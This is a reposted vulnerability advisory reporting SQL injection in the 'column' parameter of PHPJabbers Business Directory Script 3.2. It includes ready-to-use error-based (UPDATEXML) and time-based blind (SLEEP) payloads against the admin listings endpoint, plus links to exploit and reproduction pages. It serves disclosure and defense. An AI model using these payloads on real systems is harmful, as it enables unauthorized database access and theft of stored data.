Business Directory Script 3.2 SQL Injection

Aug 26, 2023 12:00 am Cyber Security 201

## Title: Business-Directory-Script-3.2 SQLi## Author: nu11secur1ty## Date: 08/25/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/business-directory-script/#sectionDemo## Reference: https://portswigger.net/web-security/sql-injection


## Description:The `column` parameter appears to be vulnerable to SQL injectionattacks. The payload ‘ was submitted in the column parameter, and adatabase error message was returned. You should review the contents ofthe error message, and the application’s handling of other input, toconfirm whether a vulnerability is present. Additionally, the payload(select*from(select(sleep(20)))a) was submitted in the columnparameter. The application took 20271 milliseconds to respond to therequest, compared with 230 milliseconds for the original request,indicating that the injected SQL command caused a time delay. Theattacker can steal all information from the database of the server ofthis application!


STATUS: HIGH-CRITICAL Vulnerability


[+]Payload:“`mysql—Parameter: column (GET)Type: error-basedTitle: MySQL >= 5.1 error-based – Parameter replace (UPDATEXML)Payload: controller=pjAdminListings&action=pjActionGetListing&column=(UPDATEXML(2242,CONCAT(0x2e,0x716a767a71,(SELECT(ELT(2242=2242,1))),0x7178787671),5199))&direction=ASC&page=1&rowCount=10&listing_refid=999888&keyword=999888&owner_id=&address_state=999888&address_city=999888&country_id=2&category_id=


Type: time-based blindTitle: MySQL >= 5.0.12 time-based blind – Parameter replace (substraction)Payload: controller=pjAdminListings&action=pjActionGetListing&column=(SELECT6261 FROM (SELECT(SLEEP(15)))CMYC)&direction=ASC&page=1&rowCount=10&listing_refid=999888&keyword=999888&owner_id=&address_state=999888&address_city=999888&country_id=2&category_id=—


“`


## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Business-Directory-Script-Version%3A3.2/SQLi)


## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/business-directory-script-version32-sqli.html)


## Time spend:01:35:00





Support the originator by clicking the read the rest link below.
business directory script injection
Read The Rest from the original source
kizzmyanthia.com

Related News

Be in Touch

All Rights Reserved #1 Source for Cyber Security News, Reports and Threat Intelligence
Powered By The Internet!!!!